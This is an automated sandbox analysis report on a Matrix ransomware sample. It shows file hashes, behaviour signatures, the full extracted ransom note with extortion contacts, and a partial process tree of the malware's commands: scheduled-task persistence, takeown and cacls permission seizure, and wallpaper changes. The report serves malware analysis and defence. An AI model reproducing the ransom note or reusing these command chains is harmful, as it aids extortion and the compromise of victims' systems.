Overview

overview

10

Static

static

3

MatrixRansomware.exe

windows7-x64

10

MatrixRansomware.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 19:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MatrixRansomware.exe

  • Size

    1.2MB

  • MD5

    a93bd199d34d21cc9102600c6ce782cf

  • SHA1

    31b50d84aa1af4f0e76a523382caba476f6e45dc

  • SHA256

    242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

  • SHA512

    642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

  • SSDEEP

    24576:NykKxXJdZiDTrfJR5ez1888K0aNE1eXTBoAlK/u95ByxXEfui:N8bcLK+KzlK/udyh/i

Score
10/10
matrixcredential_accessdefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealerupx

Malware Config

Extracted

Path

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\#README_EMAN#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 28CFDFB9A30FCE4A\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 28CFDFB9A30FCE4A\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 doQTZIhm\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Matrix family
    matrix
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Executes dropped EXE 64 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 27 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe
    "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe"
    1⤵
    • Matrix Ransomware
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe" "C:\Users\Admin\AppData\Local\Temp\NWWdFPJ5.exe"
      2⤵
        PID:436
      • C:\Users\Admin\AppData\Local\Temp\NWWdFPJ5.exe
        "C:\Users\Admin\AppData\Local\Temp\NWWdFPJ5.exe" -n
        2⤵
        • Executes dropped EXE
        PID:3668
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\4uu3FJYg.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\4uu3FJYg.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:4244
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:6480
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:7412
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\qXsbtbFk.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\qXsbtbFk.vbs"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3360
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dHHgJtEL.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5176
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dHHgJtEL.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:8516
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:6108
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:4404
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:6012
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                3⤵
                  PID:3780
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5256
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "store.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:6748
                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                    lrEU2Z2i.exe -accepteula "store.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:8140
                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i64.exe
                      lrEU2Z2i.exe -accepteula "store.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:7796
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:8060
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
                  3⤵
                    PID:6388
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
                    3⤵
                      PID:6436
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ActivitiesCache.db" -nobanner
                      3⤵
                        PID:6472
                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                          lrEU2Z2i.exe -accepteula "ActivitiesCache.db" -nobanner
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:6900
                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                        3⤵
                        • Executes dropped EXE
                        PID:6860
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
                      2⤵
                        PID:6328
                        • C:\Windows\SysWOW64\cacls.exe
                          cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
                          3⤵
                            PID:6676
                          • C:\Windows\SysWOW64\takeown.exe
                            takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
                            3⤵
                            • Modifies file permissions
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6464
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
                            3⤵
                              PID:6452
                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                lrEU2Z2i.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
                                4⤵
                                • Executes dropped EXE
                                PID:6980
                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                              3⤵
                              • Executes dropped EXE
                              PID:6588
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Mail\wab.exe""
                            2⤵
                              PID:6576
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
                                3⤵
                                  PID:2632
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /F "C:\Program Files\Windows Mail\wab.exe"
                                  3⤵
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:7868
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "wab.exe" -nobanner
                                  3⤵
                                    PID:7584
                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                      lrEU2Z2i.exe -accepteula "wab.exe" -nobanner
                                      4⤵
                                      • Executes dropped EXE
                                      PID:7184
                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                    3⤵
                                    • Executes dropped EXE
                                    PID:7692
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
                                  2⤵
                                    PID:6828
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      3⤵
                                        PID:4404
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
                                        3⤵
                                          PID:1404
                                        • C:\Windows\SysWOW64\takeown.exe
                                          takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
                                          3⤵
                                          • Modifies file permissions
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:856
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                          3⤵
                                            PID:5268
                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                              lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:5004
                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5160
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
                                          2⤵
                                            PID:7404
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
                                              3⤵
                                                PID:7568
                                              • C:\Windows\SysWOW64\takeown.exe
                                                takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
                                                3⤵
                                                • Modifies file permissions
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7420
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                3⤵
                                                  PID:5556
                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                    lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:1240
                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:7740
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Mail\wabmig.exe""
                                                2⤵
                                                  PID:7504
                                                  • C:\Windows\SysWOW64\cacls.exe
                                                    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
                                                    3⤵
                                                      PID:3132
                                                    • C:\Windows\SysWOW64\takeown.exe
                                                      takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
                                                      3⤵
                                                      • Modifies file permissions
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:7232
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "wabmig.exe" -nobanner
                                                      3⤵
                                                        PID:5748
                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                          lrEU2Z2i.exe -accepteula "wabmig.exe" -nobanner
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5768
                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:5448
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
                                                      2⤵
                                                        PID:5352
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                          3⤵
                                                            PID:7212
                                                          • C:\Windows\SysWOW64\takeown.exe
                                                            takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
                                                            3⤵
                                                            • Modifies file permissions
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2700
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                            3⤵
                                                              PID:7444
                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:7496
                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:3456
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
                                                            2⤵
                                                              PID:7396
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                cacls "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6912
                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:7484
                                                              • C:\Windows\SysWOW64\cmd.exe
